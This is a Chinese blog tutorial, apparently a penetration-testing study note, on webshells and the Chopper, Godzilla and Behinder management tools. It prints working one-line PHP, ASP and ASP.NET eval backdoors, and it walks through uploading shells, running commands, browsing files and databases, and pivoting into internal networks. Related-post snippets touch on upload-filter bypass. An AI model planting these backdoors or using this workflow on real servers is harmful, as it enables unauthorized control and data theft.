webshell及工具

已于 2023-05-23 09:50:56 修改
阅读量2.4k 收藏 17
点赞数 1
分类专栏: 每日积累 文章标签: webshell 渗透测试
于 2023-05-10 15:34:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyingcheng/article/details/130365336
版权

目录

一,Webshell的概念

二,eval函数的定义和用法

三,连接工具菜刀

 3.1文件管理

3.2 虚拟终端

3.3 菜刀与burpsuite联动

四,哥斯拉的使用

五,冰蝎

 六,webshell分类

 七,webshell如何连接

 

一,Webshell的概念

       webshell可以理解为是黑客通过各种手段上传到服务器的一段脚本,通过这段脚本执行服务器代码而达到控制服务器的功能。

常见的脚本语言有:

php,asp,asp.net,jsp

例如:

PHP:<?php@eval($_POST['caidao']);?>

<?php

@eval( $_POST['caidao'] );

?>
//eval是函数,传递的是$_POST里面的参数

ASP:<%eval request("caidao")%>

ASP.NET:<%@Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>

Jspwebshell

二,eval函数的定义和用法

1,eval()函数把字符串按照php代码来计算;

2,该字符串必须是合法的php代码,且必须以分号结尾;

php中的echo的功能是把参数直接输出到页面上:

shell.php中的代码:

<?php
 
echo $_POST['caidao'];


?>

 给参数caidao赋值,然后输出到页面上:

给caidao的值111输出到页面是111

eval函数把字符串按照php代码进行解析,并且该字符串必须是合法的php代码。

eval函数前面加上@符号可以不显示报错。

<?php
 
eval($_POST['caidao']);


?>

eval函数的作用也是解析参数,我们在firefox随意传递一个参数试试:

可以看到没有加@时我们会看到报错信息

 当我们加上@再次运行看看:

一样的数据,但是没有报错

这时候,当我们传递的参数是 合法的php代码,phpinfo(),我们再次运行:

可以看到正确的回显信息,但是一定要记住末尾要以分号结尾,否则会报错

eval函数将客户端传递的字符串传递进来之后在服务器端解析出来,这个过程叫代码执行

从下图可以发现,eval函数可以将传入的参数当做php代码来执行

注意:

当我们输入windows命令时需要用分号括起来,注意是键盘数字1旁边的分号··

三,连接工具菜刀

添加完之后多了一条记录:

 3.1文件管理

 然后鼠标右键点文件管理:

出现了类似于windows的磁盘管理器,在这里直接可以看到网站的根目录

在这里可以发现,我们不光可以看到网站的根目录,还可以看到其他的文件,说明权限设置有问题。

同理,还可以看到当前网站的数据库信息:

3.2 虚拟终端

 比如,当我们通过菜刀开启这个网站的虚拟终端可以查看此网站的权限:

可以看到这里是系统管理员权限,但是正常的情况下在此网站根目录下是不可以看其他的文件的

3.3 菜刀与burpsuite联动

因为菜刀的默认浏览器是IE浏览器,所以我们打开IE浏览器的代理设置:

打开代理之前首先需要打开IE浏览器的Internet Explore模式

然后通过设置打开代理

注意代理的端口要改为8080:

然后我们打开burpsuite的拦截,例如我们在菜刀上的活动:打开虚拟终端执行一条命令,这时在burpsuite上会截取一段数据包:

四,哥斯拉的使用

点击jar文件:

在前面看到的webshell特征过于明显,很容易被查杀,如下图:

使用哥斯拉:

点击管理->生成,可以看到如下页面

 输入自己设置的密码和密钥,这样处理和上面见到的webshell的区别是在即使别人知道了这个webshell但是没有密码也很难利用的。

想生成什么脚本就选择什么加密:

然后点击生成,按照步骤保存:

可以看到生成的webshell:

现在我们将这个webshell放入到网站的根目录下:

用工具访问webshell是空白说明正常:

然后添加webshell测试连接:

显示测试连接成功:

部分功能介绍:

代理主机与代理端口:

例如在进行护网的时候,在做内网渗透时,在内网中拿到一个webshell。这时我们在外面是连不进去的,这时可以通过改变主机和端口进行添加。

然后点击添加,就可以看到和菜刀一样的功能页面:

右键点击进入:

可以看到基础信息:

命令执行窗口可以直接输入windows命令:

文件管理和菜刀大同小异:

数据库管理:

五,冰蝎

点进去:

 

 冰蝎自带webshell:

 比如打开php版本的:

可以看到是比较复杂的webshell,不是一句话webshell

 正常情况我们需要修改默认的md5密码的,可以在cmd5.com中进行修改:

 按要求截取前16位:

 

然后将修改后的webshell传到网站服务器上:

 在冰蝎中右键点击新增shell:

 在添加之前可以先用firefox测试一下这个webshell是否存在:

出现空白即存在

添加shell:

 

 点进去能看见具体信息就说明连接成功了:

 然后就可以依次使用自带的功能了

 六,webshell分类

全功能大马:包含文件管理,命令执行,数据库连接,端口扫描等功能;

一句话小马:主要借助于webshell连接工具进行连接执行诸如文件管理,命令执行,数据库管理等操作

特定功能木马:命令执行,目录扫描

 例:

大马

通过网站来进行文件管理,命令执行等操作

firefox访问:

登陆密码是angel,查看webshell密码可以看到

报错但不用管

 七,webshell如何连接

大马:直接在浏览器访问,大多数输入密码即可

一句话木马:需要借助webshell链接工具进行连接

是小何不是小盒呀
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
测试成功的log备份webshell代码
02-12
测试成功的log备份webshell代码。 郑重声明:此代码收集于网络,仅用于个人计算机技术学习,用于非法用途者后果自负,本人不承担任何责任和连带责任!
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
网络安全-webshell详解(原理、攻击、检测与防御)
m0_59162248的博客
12-13 5350
Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马,一般分为大马、小马、一句话木马。大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell
常见webshell工具及特征分析
白帽黑客八哥的博客
05-29 1538
在工作中经常会遇到各种websehll,黑客通常要通过各种方式获取 webshell,从而获得企业网站的控制权,识别出webshell文件或通信流量可以有效地阻止黑客进一步的攻击行为,下面以常见的四款webshell进行分析,对工具连接流量有个基本认识。Webshell简介webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
webshell详解
w17791476027的博客
08-03 4221
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成webshell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
常用的WebShell管理工具
美奇软件开发工作室
10-13 2902
1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 官网:http://www.maicaidao.co/ 2、蚁剑(AntSword) AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。 github项目地址:https://
中国蚁剑 webshell工具
08-12
中国蚁剑
基于python开发的webshell检测工具
最新发布
06-28
【作品名称】:基于python开发的webshell检测工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 使用说明 Usage: ...
webshell管理工具
01-11
6. **法律法规**:了解并遵守相关法律法规,不要使用Webshell工具进行非法活动。 总的来说,Webshell管理工具是IT运维中的一个重要辅助手段,正确使用可以极大提升效率,但同时也需要谨慎处理,确保网络安全和个人...
webshell的扫描工具
12-16
『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
什么是webshell 常见的webshell工具有哪些
qq_44005305的博客
10-16 1771
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
WebShell简介
Karka_的博客
06-08 968
• JSP类型• ASP类型• PHP类型。
webshell是什么?网络安全攻防之webshell攻击!
Galaxy_0的博客
12-29 2222
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。
webshell及木马详解
金色%夕阳的博客
04-24 5613
webshell简介 什么是webshell ,一句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
Webshell管理工具
ssslq的博客
03-05 2098
基本管理工具
WebShell是什么?如何抵御WebShell?
a38417的博客
08-10 2362
WebShell是黑客经常使用的一种恶意脚本,原理就是利用Web服务器自身的环境运行的恶意代码。就是通过WebShell脚本的上传,利用网页服务程序实现操控服务器的一种方式。以PHP语言为例,只需要编写一个简单的PHP代码文件,上传到网站目录中,就可以对网站服务器进行操控,包括读取数据库、删除文件、修改主页等都可以做到。这么一个简单的语句就可以为黑客入侵打开一扇大门,让黑客可以随意地执行任意代码。Webshell是通过服务器开放的端口获取服务器的某些权限。...
webshell查杀工具
05-05
Webshell是一种常见的黑客工具,它可以在受害者的服务器上执行命令并窃取敏感信息。为了防止Webshell的滥用,可以使用一些Webshell查杀工具来检测和清除已知的Webshell文件。 以下是一些常用的Webshell查杀工具: 1. WSSAT(Web Security Scanner and Auditing Tool):WSSAT是一款开源的Web安全评估工具,支持Webshell扫描和查杀功能。 2. Webshell Detector:Webshell Detector是一款基于PHP的Webshell扫描工具,可以扫描Web服务器上的所有文件,检测是否存在Webshell文件,并提供清除功能。 3. AntSword:AntSword是一款Webshell管理工具,它可以检测Web服务器上的所有Webshell文件,并提供清除功能。 4. Cknife:Cknife是一款基于Python的Webshell管理工具,它可以自动化检测和清除Web服务器上的Webshell文件。 5. Webscan:Webscan是一款基于Java的Web安全扫描工具,支持Webshell扫描和查杀功能。 需要注意的是,Webshell查杀工具只能检测和清除已知的Webshell文件,对于新型的Webshell文件可能无法有效识别。因此,建议定期更新Web服务器和应用程序的安全补丁,加强服务器的安全配置,以最大程度地降低Webshell攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值